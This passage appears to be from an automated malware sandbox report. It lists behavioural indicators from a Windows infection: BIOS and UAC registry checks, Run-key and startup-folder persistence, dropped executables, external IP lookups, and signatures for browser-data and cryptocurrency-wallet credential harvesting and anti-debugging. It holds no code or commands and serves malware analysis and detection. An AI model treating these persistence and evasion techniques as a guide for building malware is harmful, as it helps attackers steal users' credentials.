| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\System32\Conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\j_sG47ABVU_dnhRofMeyIAvt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Data\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe | C:\Program Files (x86)\Company\NewProduct\customer3.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe | C:\Program Files (x86)\Company\NewProduct\customer3.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Cleaner = "C:\\Users\\Admin\\AppData\\Roaming\\Cleaner\\Cleaner.exe --anbfs" | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\build.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\build.\\build.exe" | C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\MaskVPN\\Hetysholoxa.exe\"" | C:\Users\Admin\AppData\Local\Temp\is-6JNGI.tmp\ultradumnibour.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | C:\Users\Admin\AppData\Roaming\4750957.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\kNQQghA2b3_W8RSpEJCcChiB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Data\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\j_sG47ABVU_dnhRofMeyIAvt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\2HuEPZ58JHXyBF7DWrWix9G2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Data\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\tlQg7FWtgrgJmIVIZfF7FQAG.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\B25D.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\JDkxd0BisQ3uX9WNGecGxdCL.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4667c037-9d39-1a4f-a437-4e3a4b4be156}\SET2AA3.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4667c037-9d39-1a4f-a437-4e3a4b4be156} | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4667c037-9d39-1a4f-a437-4e3a4b4be156}\tap0901.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4667c037-9d39-1a4f-a437-4e3a4b4be156}\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4667c037-9d39-1a4f-a437-4e3a4b4be156}\SET2A91.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4667c037-9d39-1a4f-a437-4e3a4b4be156}\oemvista.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{4667c037-9d39-1a4f-a437-4e3a4b4be156}\SET2AA2.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\drvstore.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{4667c037-9d39-1a4f-a437-4e3a4b4be156}\SET2A91.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4667c037-9d39-1a4f-a437-4e3a4b4be156}\SET2AA2.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{4667c037-9d39-1a4f-a437-4e3a4b4be156}\SET2AA3.tmp | C:\Windows\system32\DrvInst.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe | C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-1HU2J.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-MB3CH.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\UltraMediaBurner\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-BMVEP.tmp\ultramediaburner.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-7DGD4.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-BVG3G.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\d.jfm | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\libass.dll | C:\Users\Admin\AppData\Local\Temp\is-GDHQN.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\ssleay32.dll | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-K1KJI.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-55VDM.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\unins000.msg | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\ipseccmd.exe | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-5VR27.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe | C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\libMaskVPN.dll | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-ROHGV.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\Uninstall.ini | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-4FDJ6.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-ARPGM.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\Hetysholoxa.exe.config | C:\Users\Admin\AppData\Local\Temp\is-6JNGI.tmp\ultradumnibour.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-ASHLO.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-TIAD1.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\javaw.exe | C:\Users\Admin\AppData\Local\Temp\is-GDHQN.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-M4UIH.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe | C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-U0UGB.tmp | C:\Users\Admin\AppData\Local\Temp\is-GDHQN.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-KKD6D.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-CVSOK.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-44DPS.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\Hetysholoxa.exe | C:\Users\Admin\AppData\Local\Temp\is-6JNGI.tmp\ultradumnibour.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe | C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-0EB7M.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\d | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-5723U.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-FASEI.tmp | C:\Users\Admin\AppData\Local\Temp\is-GDHQN.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\tunnle.exe | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-KRJH5.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\QtProfiler.exe | C:\Users\Admin\AppData\Local\Temp\is-GDHQN.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-BJN6M.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-5CJCO.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\customer3.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-37JL7.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-A4KI5.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-45M9J.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-7ME2P.tmp | C:\Users\Admin\AppData\Local\Temp\is-GDHQN.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe | C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\customer3.exe | C:\Users\Admin\Documents\u9pzYiYnNByA7uyFsDrbpZcm.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-GQSSM.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe | C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\MaskVPN.exe | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-L0IB1.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe | C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\Setup.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | C:\Windows\SysWOW64\WerFault.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setupact.log | C:\Windows\SysWOW64\expand.exe | N/A |
